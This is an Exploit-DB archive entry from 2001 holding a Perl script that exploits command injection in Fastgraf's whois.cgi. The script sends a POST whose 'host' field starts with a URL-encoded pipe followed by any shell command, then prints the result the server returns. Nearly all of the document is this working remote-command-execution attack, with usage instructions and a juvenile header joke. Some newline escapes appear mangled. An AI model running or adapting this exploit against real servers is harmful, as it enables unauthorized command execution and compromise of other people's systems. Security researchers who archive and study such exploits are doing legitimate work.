https://www.exploit-db.com/exploits/242

漏洞细节尚未披露

#!/usr/bin/perl
###############################################################
# whois.pl - Marco van Berkum - [email protected]            #
# homepage: http://ws.obit.nl - exploits Fastgraf's whois.cgi #                           
#                                                             #
# DO NOT EDIT THIS HEADER, else the bedbugs will bite         #
# Greets to sigmo for finding stupid POST examples            #
# Also greetings to DUCKEL (YES YOU HAVE CREDIT NOW ;))       #
#                                                             #
# Use like this:                                              #
# ./whois.pl www.ifyoureadthisyouaregay.com "ls -al"          #
###############################################################

use IO::Socket;
$host = $ARGV[0]; $command = $ARGV[1]; $length = length($command) + 8;

$sock = new IO::Socket::INET (PeerAddr => $host, PeerPort => 80, Proto    => 'tcp');
if($sock) {
print $sock "POST http://$host/cgi-bin/whois.cgi HTTP/1.0
User-Agent: Whois Meta Character Exploit Browser :P
Host: $host
Content-length: $length

host=%7c$commandnn";
sleep(3); # change to lower or higher, depending on your connection 
sysread($sock, $buffer, 100000);
        ($empty, $output) = split(/PRE/, $buffer);
        $output =~ s/[<>/]//g;
        if($output) {
        print("$outputn");
       } else { print "No data, or not vulnerablen";
     }
    } 
close $sock;


# milw0rm.com [2001-01-12]